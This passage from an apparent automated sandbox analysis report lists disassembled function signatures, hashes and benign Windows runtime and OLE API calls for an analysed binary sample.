                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Exception@8Throw$ExceptionRaiseXinvalid_argumentstd::_
                                            • String ID: exceeds the maximum of $ for this public key$: message length of $: this key is too short to encrypt any messages
                                            • API String ID: 3807434085-412673420
                                            • Opcode ID: 677c003647920751c9d48eb5d8ffe5e55e97842ef9550c7e9f17afc7266b0fe6
                                            • Instruction ID: 85d282a56e4387ef23e2c15b452b230c820ae176e483d1f99fd38c45dd4bdd53
                                            • Opcode Fuzzy Hash: 677c003647920751c9d48eb5d8ffe5e55e97842ef9550c7e9f17afc7266b0fe6
                                            • Instruction Fuzzy Hash: 82B14D711083809FD320DB69C890BDBBBE9AFD9318F14891DE59D87751DB70A909CBA3
                                            APIs
                                            • SafeArrayGetElement.OLEAUT32(?,?,67D4BDE6), ref: 6CEB3C49
                                            • VariantInit.OLEAUT32(?), ref: 6CEB3C81
                                            • VariantClear.OLEAUT32(?), ref: 6CEB3D26
                                            • VariantClear.OLEAUT32(?), ref: 6CEB3D30
                                            • VariantClear.OLEAUT32(?), ref: 6CEB3D89
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Variant$Clear$ArrayElementInitSafe
                                            • String ID: ljl
                                            • API String ID: 4110538090-1208423595
                                            • Opcode ID: 65038a0e9f47dbae082e4713ecb70c6ee8d381cb1db0e08fcfd00e579fb50d4a
                                            • Instruction ID: 4b8e5824d56257523f05e9aa7632fa03c8fcc45245dc98cef83ce39bc4965c7c
                                            • Opcode Fuzzy Hash: 65038a0e9f47dbae082e4713ecb70c6ee8d381cb1db0e08fcfd00e579fb50d4a
                                            • Instruction Fuzzy Hash: 0A617D76A00249AFCB00DFA8C9819EEBBB5FF49314F25859DE515BB750C731AD05CBA0
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6CEF126E
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
                                              • Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113
                                            • _memmove.LIBCMT ref: 6CEF12E0
                                            • _memmove.LIBCMT ref: 6CEF1305
                                            • _memmove.LIBCMT ref: 6CEF1342
                                            • _memmove.LIBCMT ref: 6CEF135F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                            • String ID: deque<T> too long
                                            • API String ID: 4034224661-309773918
                                            • Opcode ID: 89a1ec45e91537d2907cdaf6a89fcf8b29526dca224e4f54f8c28048a8ce7b78
                                            • Instruction ID: 2120a584788f4c2a9aab0843dfed3cb21d783365e500fb9bb40f1efa604fd762
                                            • Opcode Fuzzy Hash: 89a1ec45e91537d2907cdaf6a89fcf8b29526dca224e4f54f8c28048a8ce7b78
                                            • Instruction Fuzzy Hash: B4410AB2A042044BD704CE68CC8056BB7F6EBC4314F2D862DE859D7B44FA74ED068792
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6CEF13BE
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
                                              • Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113
                                            • _memmove.LIBCMT ref: 6CEF1431
                                            • _memmove.LIBCMT ref: 6CEF1456
                                            • _memmove.LIBCMT ref: 6CEF1493
                                            • _memmove.LIBCMT ref: 6CEF14B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                            • String ID: deque<T> too long
                                            • API String ID: 4034224661-309773918
                                            • Opcode ID: e057a9fe33dd00cdbcaeabad0819e259db8d9097d85f50e3f00bddb6636d5289
                                            • Instruction ID: 40c09e4ed37f56d68f77c7cd016391542d0d55449ca3496cc46082a5b15b4fdd
                                            • Opcode Fuzzy Hash: e057a9fe33dd00cdbcaeabad0819e259db8d9097d85f50e3f00bddb6636d5289
                                            • Instruction Fuzzy Hash: 1B41FDB2A042044BC704CE68DC8196BB7F6EFD4314F2D862CE859D7B44EA74ED06C7A2
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6CE94DA9
                                              • Part of subcall function 6CEF9125: std::exception::exception.LIBCMT ref: 6CEF913A
                                              • Part of subcall function 6CEF9125: __CxxThrowException@8.LIBCMT ref: 6CEF914F
                                              • Part of subcall function 6CEF9125: std::exception::exception.LIBCMT ref: 6CEF9160
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6CE94DCA
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6CE94DE5
                                            • _memmove.LIBCMT ref: 6CE94E4D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                            • String ID: invalid string position$string too long
                                            • API String ID: 443534600-4289949731
                                            • Opcode ID: 2217e2e146ad4c2b5710d38713b731cb411cb819fba3b8a63fd869f9b2345f83
                                            • Instruction ID: 7ae6e331e96988f306a40eef9e3bbaa5905561e443daf88d2ca3c63abed28e24
                                            • Opcode Fuzzy Hash: 2217e2e146ad4c2b5710d38713b731cb411cb819fba3b8a63fd869f9b2345f83
                                            • Instruction Fuzzy Hash: 0531C5323042148FD3258E6CE880AAAF3F5AB91728B304A2FE572CFB40D771D844C791
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Name::operator+$NameName::
                                            • String ID: throw(
                                            • API String ID: 168861036-3159766648
                                            • Opcode ID: c7863ca4ac8b33449650d0fb7fd2dc8ccf9cb745774eab3c36292d3efb5df460
                                            • Instruction ID: cb8a7ab42383db1b352e119e6b2bc66161cc58b4d6eb72728aaa0e85af2839a0
                                            • Opcode Fuzzy Hash: c7863ca4ac8b33449650d0fb7fd2dc8ccf9cb745774eab3c36292d3efb5df460
                                            • Instruction Fuzzy Hash: CE0192B4B00109AFCF04DBA4C861DFE7BB9EB44B08F004155E905AB7A4DB70E94A9B90
                                            APIs
                                            • __getptd_noexit.LIBCMT ref: 6CEFCCFA
                                              • Part of subcall function 6CEFEA6D: GetLastError.KERNEL32(?,?,6CEFD7DD,6CEF9DEF,00000000,?,6CEF9BD4,6CE91290,67D4BDE6), ref: 6CEFEA71
                                              • Part of subcall function 6CEFEA6D: ___set_flsgetvalue.LIBCMT ref: 6CEFEA7F
                                              • Part of subcall function 6CEFEA6D: __calloc_crt.LIBCMT ref: 6CEFEA93
                                              • Part of subcall function 6CEFEA6D: DecodePointer.KERNEL32(00000000,?,?,6CEFD7DD,6CEF9DEF,00000000,?,6CEF9BD4,6CE91290,67D4BDE6), ref: 6CEFEAAD
                                              • Part of subcall function 6CEFEA6D: GetCurrentThreadId.KERNEL32 ref: 6CEFEAC3
                                              • Part of subcall function 6CEFEA6D: SetLastError.KERNEL32(00000000,?,?,6CEFD7DD,6CEF9DEF,00000000,?,6CEF9BD4,6CE91290,67D4BDE6), ref: 6CEFEADB
                                            • __calloc_crt.LIBCMT ref: 6CEFCD1C
                                            • __get_sys_err_msg.LIBCMT ref: 6CEFCD3A
                                            • _strcpy_s.LIBCMT ref: 6CEFCD42
                                            • __invoke_watson.LIBCMT ref: 6CEFCD57
                                            Strings
                                            • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 6CEFCD07, 6CEFCD2A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
                                            • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                            • API String ID: 3117964792-798102604
                                            • Opcode ID: 4ced4afbaf59c990334f675e0f947342a940d2645189f72ac35a835f08638732
                                            • Instruction ID: f0121bb679f2545d086f6e3887c0bafa6e552156e84dd780cca1174c4972e4b5
                                            • Opcode Fuzzy Hash: 4ced4afbaf59c990334f675e0f947342a940d2645189f72ac35a835f08638732
                                            • Instruction Fuzzy Hash: 68F0907274823427D330396A5C8099E7ABD9B8676CB39093EF57897F00EA22994741A5
                                            APIs
                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,6CF29880,00000008,6CEFEAC1,00000000,00000000,?,?,6CEFD7DD,6CEF9DEF,00000000,?,6CEF9BD4,6CE91290,67D4BDE6), ref: 6CEFE9CA
                                            • __lock.LIBCMT ref: 6CEFE9FE
                                              • Part of subcall function 6CF02438: __mtinitlocknum.LIBCMT ref: 6CF0244E
                                              • Part of subcall function 6CF02438: __amsg_exit.LIBCMT ref: 6CF0245A
                                              • Part of subcall function 6CF02438: EnterCriticalSection.KERNEL32(6CEF9BD4,6CEF9BD4,?,6CEFEA03,0000000D), ref: 6CF02462
                                            • InterlockedIncrement.KERNEL32(FFFFFEF5), ref: 6CEFEA0B
                                            • __lock.LIBCMT ref: 6CEFEA1F
                                            • ___addlocaleref.LIBCMT ref: 6CEFEA3D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                            • String ID: KERNEL32.DLL
                                            • API String ID: 637971194-2576044830
                                            • Opcode ID: b1db16ab67c6a5ad631fd97bcc79167c178b7405ebc3c964589d190826d2d191
                                            • Instruction ID: 96fa69e7dbec88cc8c93e59a9a73040cd1e6032a8d245135726de794b1903a5c
                                            • Opcode Fuzzy Hash: b1db16ab67c6a5ad631fd97bcc79167c178b7405ebc3c964589d190826d2d191
                                            • Instruction Fuzzy Hash: F601AD71904B00EFD7209F66C405389FBF0BF41329F20890DD4AA93BA0CB74AA09CB61
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 60ffb48540661dde96fb2d8ea5f92d13aa58d6aa58385b16feabba6237411fd2
                                            • Instruction ID: acb39b8a98569e78aba845f82d1781bee1d809d3dac0dbaa13126413ef0d916b
                                            • Opcode Fuzzy Hash: 60ffb48540661dde96fb2d8ea5f92d13aa58d6aa58385b16feabba6237411fd2
                                            • Instruction Fuzzy Hash: 8B414F74A016059FCB10DFA9CD80A6AB7F9AF89308F30858AE515EB755D731EC41CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 7cda8d0bb9671116791401f9dcf41a66102c8f056657856fe9cd4710e6c754cf
                                            • Instruction ID: 0a603004921da7707c125b71bc5b07952624082183bc3ed12f197671cca125c4
                                            • Opcode Fuzzy Hash: 7cda8d0bb9671116791401f9dcf41a66102c8f056657856fe9cd4710e6c754cf
                                            • Instruction Fuzzy Hash: 72415E70A016189FDB00CF68CD80FAEB7B9AF89208F70859AE518EB751D731E981CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 7cda8d0bb9671116791401f9dcf41a66102c8f056657856fe9cd4710e6c754cf
                                            • Instruction ID: cf176820cd04a46bdf57220b60d9084b1370057e55648b45fe8d9f693cec0234
                                            • Opcode Fuzzy Hash: 7cda8d0bb9671116791401f9dcf41a66102c8f056657856fe9cd4710e6c754cf
                                            • Instruction Fuzzy Hash: 1D414CB0A016089FDB00CF69CE84BADB7B9AF89204F34859AE518EB751C731E941CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 2b82e12a8e16e28b7374e29514d761b911c8263329d9792503978767ac36c267
                                            • Instruction ID: ded9693aab31f37dad1d8689e69eef732b552db7ef4d7f0cdf0ecd664834bc9f
                                            • Opcode Fuzzy Hash: 2b82e12a8e16e28b7374e29514d761b911c8263329d9792503978767ac36c267
                                            • Instruction Fuzzy Hash: 33313E70E016089FCB10CF69CD80BAEB7B9AF89208F70869AE419E7755D771E981CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
